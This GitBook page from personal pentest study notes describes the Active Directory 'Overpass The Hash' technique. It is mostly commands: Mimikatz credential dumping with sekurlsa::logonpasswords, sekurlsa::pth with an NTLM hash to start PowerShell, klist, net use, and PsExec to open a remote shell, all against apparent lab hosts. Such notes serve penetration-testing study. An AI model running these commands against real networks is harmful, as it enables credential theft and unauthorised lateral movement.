TamaGorengs Notes
  • πŸ‘¨β€πŸ’»Whoami
  • πŸ—ΊοΈActive Directory
    • Active Directory Enumeration
    • AD Reconnaissance
      • LDAP
    • Movement
      • Kerberos
        • ASREProast
        • Pass The Hash
        • Pass The Ticket
        • Overpass The Hash
      • Credential
        • Dumping
          • DCSync
      • WMI and WinRM
    • Active Directory Certificate Services (ADCS)
  • πŸͺŸWindows
    • Windows Privilege Escalation
      • WinPrivEsc Enumeration
      • Leveraging Windows Services
      • Abusing Other Windows Components
    • RDP
  • 🐧Linux
    • Linux Privilege Escalation
      • LinuxPrivEsc Enumeration
      • Exposed Confidential Information
      • Insecure File Permissions
      • Insecure System Components
  • πŸ•ΈοΈWeb Application
    • SQL Injection
    • Cross-Site Scripting (XSS)
  • Group 1
    • Client-Side Attacks
      • Windows Library Files
      • Exploiting Microsoft Office
  • Thick Client
    • Thick Client Pentest
    • Thick Client Pentest Methodology
Powered by GitBook
On this page

Was this helpful?

  1. Active Directory
  2. Movement
  3. Kerberos

Overpass The Hash

Mimikatz

privilege::debug
sekurlsa::logonpasswords

Need username and NTLM hashes

sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell

Use klist to list cached Kerberos tickets

klist

Try authenticate to any fileshare

net use \\files04

Check klist again

klist

We can now use psexec.exe to authenticate

.\PsExec.exe \\files04 cmd
PreviousPass The TicketNextCredential

Last updated 4 months ago

Was this helpful?

πŸ—ΊοΈ